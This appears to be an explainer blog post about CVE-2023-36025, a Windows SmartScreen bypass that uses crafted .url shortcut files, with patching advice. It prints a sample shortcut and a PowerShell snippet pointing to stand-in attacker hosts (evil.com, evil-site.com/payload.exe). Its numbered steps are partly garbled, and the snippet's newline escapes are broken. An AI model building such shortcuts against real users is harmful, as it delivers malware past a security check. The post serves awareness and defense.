CVE CyberSecurity Database News

CVE-2023-36025 - Windows SmartScreen Security Feature Bypass Vulnerability Explained

Poster -

Date posted: June 2024
Author: [Security Simplified]


Microsoft Windows is trusted by millions, and built-in tools like SmartScreen are there to block you from running dangerous downloads. But sometimes, clever hackers find ways to walk right past those defenses. CVE-2023-36025 shows just that—a new vulnerability that lets attackers bypass SmartScreen’s warnings with a crafty trick. Let’s break down what it is, how it works, and what you need to watch out for.

What Is CVE-2023-36025?

CVE-2023-36025 is a “Windows SmartScreen Security Feature Bypass Vulnerability.” It was publicly disclosed by Microsoft in November 2023 and soon patched, but before that it could let attackers get around SmartScreen warnings and protections.

In plain language:
Normally, if you download a suspicious file from the Internet, Windows SmartScreen pops up and warns you. With this vulnerability, attackers could design files and shortcuts so that SmartScreen doesn’t even trigger a warning—even when you’re *downloading something potentially dangerous*.

Official advisory:
- Microsoft Security Update Guide CVE-2023-36025

When you download a file, Windows tags it with a “Mark of the Web” (MOTW).

- When you try to open that file, SmartScreen checks its reputation, and if it looks risky, it shows a warning screen.

You have to click “Run anyway” if you’re sure you want to open it.

But what if SmartScreen doesn’t even *see* the file?
CVE-2023-36025 tricks Windows into *forgetting* to run the security checks.

How Could Attackers Exploit This?

By crafting special Internet Shortcut files (.URL or .WEBSITE files), attackers could package malicious links that bypass SmartScreen protections completely.

Attacker sets up a malicious website and hosts a bad file.

2. Attacker crafts a special .url shortcut file that points to this website with obfuscated parameters.

SmartScreen does NOT warn or block the action.

The browser—or another application—downloads and runs the malicious file, and the victim is compromised.

Below is a sample .url file that demonstrates the kind of attack used for CVE-2023-36025

[InternetShortcut]
URL=http://malicious-domain.com/evil.exe
IconFile=\\evil.com\icon.ico

Key trick:
Attackers could add weird characters, filename tricks, or specific formatting to the URL or point the IconFile to a remote location. Microsoft’s advisory said this could confuse Windows so badly that the MOTW isn’t applied, and the usual security dialogs are skipped.

Here’s a basic PowerShell command attackers might use to automate creation of such files

$Shortcut = "[InternetShortcut]nURL=http://evil-site.com/payload.exenIconFile=\\evil.com\icon.ico"
Set-Content -Path "malicious.url" -Value $Shortcut

This tiny script makes a shortcut file that *looks* harmless, but in real attacks, the URL and icon paths would point to files on attacker servers.

Victims might run malware without *any* SmartScreen warnings.

- Even antivirus or EDR software might not always catch the slip if it expects SmartScreen to do its job.

This is especially dangerous for organizations that *rely on Windows SmartScreen* as their main defense for downloaded files.

Install the November 2023 security patch, or any newer update.

2. Be wary of strange shortcut files sent via email, chats, or suspicious websites—even if they look like regular .url or .website files.

Original References

- Microsoft’s CVE-2023-36025 Security Advisory
- Huntress Labs Deep Dive *(with PoC and technical details)*
- ZDI Analysis Blog *(from Zero Day Initiative)*
- Microsoft Patch Tuesday November 2023 *(BleepingComputer coverage)*

Final Thoughts

CVE-2023-36025 teaches us that even built-in security features like SmartScreen have weak spots. Attackers are always hunting for ways around defenses—so patches and education are your best shields. Update your devices. Be suspicious of unfamiliar shortcut files. And never trust a download blindly—SmartScreen warnings are good, but this bug is proof they’re not foolproof.


*Got questions? Want more step-by-step guides? Contact [Security Simplified] or follow us for more real-world security breakdowns!*

Timeline

Published on: 11/14/2023 18:15:31 UTC
Last modified on: 11/21/2023 01:33:13 UTC